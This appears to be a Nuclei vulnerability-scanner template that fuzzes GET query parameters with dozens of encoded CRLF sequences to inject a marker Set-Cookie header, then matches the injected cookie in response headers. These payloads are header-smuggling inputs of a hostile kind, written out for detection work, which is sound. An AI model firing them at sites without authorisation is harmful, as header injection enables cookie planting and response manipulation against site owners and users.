id: crlf-injection
info:
name: CRLF Injection
author: pdteam
severity: low
metadata:
max-request: 41
tags: crlf,dast,vuln
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
escape:
low:
- "%00"
- "%0a"
- "%0a%20"
- "%0d"
- "%0d%09"
- "%0d%0a"
- "%0d%0a%09"
- "%0d%0a%20"
- "%0d%20"
- "%20"
medium:
- "%20%0a"
- "%20%0d"
- "%20%0d%0a"
- "%23%0a"
- "%23%0a%20"
- "%23%0d"
- "%23%0d%0a"
- "%23%oa"
- "%25%30"
- "%25%30%61"
- "%2e%2e%2f%0d%0a"
- "%2f%2e%2e%0d%0a"
- "%2f..%0d%0a"
- "%3f"
high:
- "%3f%0a"
- "%3f%0d"
- "%3f%0d%0a"
- "%e5%98%8a%e5%98%8d"
- "%e5%98%8a%e5%98%8d%0a"
- "%e5%98%8a%e5%98%8d%0d"
- "%e5%98%8a%e5%98%8d%0d%0a"
- "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d"
- "%u0000"
- "%u000a"
- "%u000d"
- "\r"
- "\r%20"
- "\r\n"
- "\r\n%20"
- "\r\n\t"
- "\r\t"
fuzzing:
- part: query
type: postfix
fuzz:
- "{{escape}}Set-Cookie:crlfinjection=crlfinjection"
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
# digest: 4a0a00473045022015c1830b995bcda913cc28864b15263881395c09ffeeb5dd5dad17d8f41378fd022100f157c7577fbeb68be85c3343f2c4ee02312f6e8fd577e55699f645a6a9fbd955:922c64590222798bb761d5b6d8e72950